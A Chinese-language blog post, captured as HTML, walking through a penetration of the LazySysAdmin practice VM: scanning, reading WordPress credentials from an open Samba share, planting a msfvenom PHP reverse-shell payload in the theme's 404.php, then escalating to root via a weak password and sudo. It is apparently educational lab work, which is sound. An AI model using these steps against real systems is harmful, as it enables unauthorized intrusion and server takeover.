

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/kqcy.jpg">
  <link rel="icon" href="/img/kqcy.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>lazysysadmin靶机练习 - CompactDisk</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>CompactDisk's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                about me
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="lazysysadmin靶机练习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-04-28 10:47" pubdate>
        April 28, 2021 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      14
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">lazysysadmin靶机练习</h1>
            
            <div class="markdown-body">
              <h3 id="lazysysadmin靶机练习"><a href="#lazysysadmin靶机练习" class="headerlink" title="lazysysadmin靶机练习"></a>lazysysadmin靶机练习</h3><h4 id="网络结构："><a href="#网络结构：" class="headerlink" title="网络结构："></a>网络结构：</h4><p>环境搭建平台为VMware15，网络为nat模式，网段192.168.1.0/24</p>
<p>网络由攻击机kali、靶机组成</p>
<p>靶机ip：192.168.1.138</p>
<p>kali linux ip：192.168.1.137</p>
<h4 id="信息收集："><a href="#信息收集：" class="headerlink" title="信息收集："></a>信息收集：</h4><p>主机发现：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nmap</span> -sP <span class="hljs-number">192.168.1.0</span>/<span class="hljs-number">24</span><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/%E6%B5%8B%E8%AF%95.png" srcset="/img/loading.gif" lazyload alt="image-20210127195115436"></p>
<p>端口扫描：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">nmap</span> -sV <span class="hljs-number">192.168.1.138</span><br></code></pre></td></tr></table></figure>

<p>可以看到目标主机开放了samba服务，先放着一会再看</p>
<p><img src="E:\大三上作业练习\web安全\web练习\lazysysadmin靶机练习\lazysysadmin靶机练习.assets\image-20210128221658996.png" srcset="/img/loading.gif" lazyload alt="image-20210128221658996"></p>
<p>目录爆破：</p>
<p>这里用了kali里已有的dirb进行目录遍历</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">dirb <span class="hljs-string">&quot;http://192.168.1.138&quot;</span> <span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/dirb/</span>wordlists/big.txt<br></code></pre></td></tr></table></figure>

<p>可以看到有一个wordpress目录，猜想网站是wordpress架构的，另外有一个phpmyadmin目录，大概可以登录管理数据库</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130102741766.png" srcset="/img/loading.gif" lazyload alt="image-20210130102741766"></p>
<p>直接访问80端口，跳转到一个近似静态的页面，几乎没有什么互动性，也不会跳转到其他页面</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130222825295.png" srcset="/img/loading.gif" lazyload alt="image-20210130222825295"></p>
<p>查看一下robots.txt</p>
<p>显示出来的目录和我们用dirb爆破出的基本一致</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130224040160.png" srcset="/img/loading.gif" lazyload alt="image-20210130224040160"></p>
<p>依次访问我们之前爆破出的目录，看看有什么有用的信息</p>
<p>访问<a target="_blank" rel="noopener" href="http://192.168.1.138/wordpress/wp-admin/%E6%97%B6%E4%BC%9A%E8%B7%B3%E8%BD%AC%E5%88%B0%E4%B8%80%E4%B8%AA%E5%90%8E%E5%8F%B0%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%EF%BC%8C%E4%B8%8D%E7%9F%A5%E9%81%93%E8%B4%A6%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81%EF%BC%8C%E5%85%88%E6%94%BE%E7%9D%80">http://192.168.1.138/wordpress/wp-admin/时会跳转到一个后台管理登录页面，不知道账户名密码，先放着</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130222411433.png" srcset="/img/loading.gif" lazyload alt="image-20210130222411433"></p>
<p>访问<a target="_blank" rel="noopener" href="http://192.168.1.138/phpmyadmin/%E4%BC%9A%E8%B7%B3%E8%BD%AC%E5%88%B0phpmyadmin%EF%BC%8C%E4%BE%9D%E6%97%A7%E6%94%BE%E5%9C%A8%E4%B8%80%E8%BE%B9">http://192.168.1.138/phpmyadmin/会跳转到phpmyadmin，依旧放在一边</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130222610561.png" srcset="/img/loading.gif" lazyload alt="image-20210130222610561"></p>
<p>直接访问wordpress目录会到一个可留言的web页面，内容全部是my name is togie看起来像是个博客之类的，翻到底下还可以看见评论</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130224307649.png" srcset="/img/loading.gif" lazyload alt="image-20210130224307649"></p>
<h4 id="漏洞挖掘："><a href="#漏洞挖掘：" class="headerlink" title="漏洞挖掘："></a>漏洞挖掘：</h4><p>网站上并没有发现什么特别有用的信息，除了看到一个togie，疑似用户名，可以尝试ssh爆破，其他地方没有很明显的漏洞点，我们之前扫描端口的时候发现了靶机开放，连上去看一看</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">smb:<span class="hljs-regexp">//</span><span class="hljs-number">192.168</span>.<span class="hljs-number">1.138</span>/<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130224846851.png" srcset="/img/loading.gif" lazyload alt="image-20210130224846851"></p>
<p>点进共享文件夹后，可以看到里面的这些目录，和我们爆破到的网站目录基本一致，既然如此，可以看看有没有我们想要找的配置文件，比如说wp-congfig.php之类的</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130225107101.png" srcset="/img/loading.gif" lazyload alt="image-20210130225107101"></p>
<p>果然有，打开以后找到我们想要的数据库用户名密码</p>
<p>Admin、TogieMYSQL12345^^</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210130225244557.png" srcset="/img/loading.gif" lazyload alt="image-20210130225244557"></p>
<p>还可以在一个deets.txt文件里看到一串密码12345，暂时不知道有什么用</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131223946613.png" srcset="/img/loading.gif" lazyload alt="image-20210131223946613"></p>
<p>分别登录到之前找到的phpmyadmin页面和wordpress后台管理页面</p>
<p>phpmyadmin很明显是没给权限，这里查不了数据表</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131222828646.png" srcset="/img/loading.gif" lazyload alt="image-20210131222828646"></p>
<p>再登录下后台试试，登录成功</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131223001074.png" srcset="/img/loading.gif" lazyload alt="image-20210131223001074"></p>
<p>进到后台之后挨个页面查看，可以看到一个页面可以修改部分页面代码，如下图，我们可以看到一个404.php，点进去看一下</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131223240722.png" srcset="/img/loading.gif" lazyload alt="image-20210131223240722"></p>
<p>看了这个页面内容后，这是一个显示访问页面不存在的一个跳转页面，我们测试一下猜想，在/wordpress路径下随便提交个不存在的参数</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131223710635.png" srcset="/img/loading.gif" lazyload alt="image-20210131223710635"></p>
<p>可以看到，上下两图的回显内容是一样的，是此页面对应的源码没错</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131223637610.png" srcset="/img/loading.gif" lazyload alt="image-20210131223637610"></p>
<p>既然这里可以修改源码，那我们可以在这里换上我们的代码，反弹一个shell回来</p>
<p>先用msf制作一个反弹shell的php木马</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msfvenom -p php/meterpreter/reverse_tcp <span class="hljs-attribute">LHOST</span>=192.168.1.137 <span class="hljs-attribute">lport</span>=4444 -f<span class="hljs-built_in"> raw </span>&gt; 1.php<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210113200422878.png" srcset="/img/loading.gif" lazyload alt="image-20210113200422878"></p>
<p>生成木马如下图，ip地址为kali的ip，端口号4444为kali要监听的端口</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210113200652237.png" srcset="/img/loading.gif" lazyload alt="image-20210113200652237"></p>
<p>我们把这个代码内容粘贴到之前的那个404.php里</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131224448320.png" srcset="/img/loading.gif" lazyload alt="image-20210131224448320"></p>
<p>点击update更新</p>
<p>然后在kali端监听端口</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131224649182.png" srcset="/img/loading.gif" lazyload alt="image-20210131224649182"></p>
<p>再次刷新之前那个显示notfound的页面，反弹成功，查看下信息，无误</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131224904654.png" srcset="/img/loading.gif" lazyload alt="image-20210131224904654"></p>
<h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><p>提权用到了之前的那个deets.txt里提到的密码12345，以及/wordpress路径下主页面反复提到的my name is togie(讲实话这个地方一串这个有点吓人)</p>
<p>言归正传，是在参考了网上其他writeup后发现了这个密码12345和togie的联系和用处(文章末尾附参考链接)，首先我们利用已经获取到的shell，在获取一个交互shell，以使用su命令</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">python -<span class="hljs-keyword">c</span> <span class="hljs-string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;);&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131225911932.png" srcset="/img/loading.gif" lazyload alt="image-20210131225911932"></p>
<p>当我们转换到togie用户后会惊喜的发现，他可以直接转root用户，至此提权完毕，整个渗透过程也已经完成了</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131230343421.png" srcset="/img/loading.gif" lazyload alt="image-20210131230343421"></p>
<p>提权过程出乎意料的短，整个靶机的渗透过程相对其他靶机也显得稍有些简单，但一切简单全都源于后台放了一个含密码的deets.txt文件在网站wordpress根目录下，此处提到推出服务器后，记得删除该文件，并及时更新密码，但管理员并没有这样做，这也就是lazysysadmin的含义了吧，也是我们平时很容易犯的错误。</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131230650845.png" srcset="/img/loading.gif" lazyload alt="image-20210131230650845"></p>
<h4 id="其他思路："><a href="#其他思路：" class="headerlink" title="其他思路："></a>其他思路：</h4><p>其实刚刚进到wordpress路径下的时候看到那个togie用户名就可以尝试ssh爆破一下的，后来我们看到的那个密码12345强度也相当弱，用网上找的到的大多数字典也都可以爆破的出</p>
<p>依旧是用msf，用ssh的爆破模块，这里用户名和密码的字典是分开的，用户名的字典里我自己添加了togie这个用户名</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131231448491.png" srcset="/img/loading.gif" lazyload alt="image-20210131231448491"></p>
<p>很快就能爆破的出用户名密码 togie:12345</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131231923661.png" srcset="/img/loading.gif" lazyload alt="image-20210131231923661"></p>
<p>ssh连接</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131231823832.png" srcset="/img/loading.gif" lazyload alt="image-20210131231823832"></p>
<p>切换root用户</p>
<p><img src="https://cdn.jsdelivr.net/gh/C0mpactDisk/cloudimg//img/image-20210131232113083.png" srcset="/img/loading.gif" lazyload alt="image-20210131232113083"></p>
<p>文章参考：</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/114916169">https://zhuanlan.zhihu.com/p/114916169</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8F/">靶机渗透</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    作者：CompactDisk，本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/04/29/HackInOS%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">HackInOS靶机练习</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/04/27/%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0-1%EF%BC%9Abillu-b0X/">
                        <span class="hidden-mobile">靶机练习-1：billu_b0X</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a  target="_blank" rel="nofollow noopener"><span>CompactDisk</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
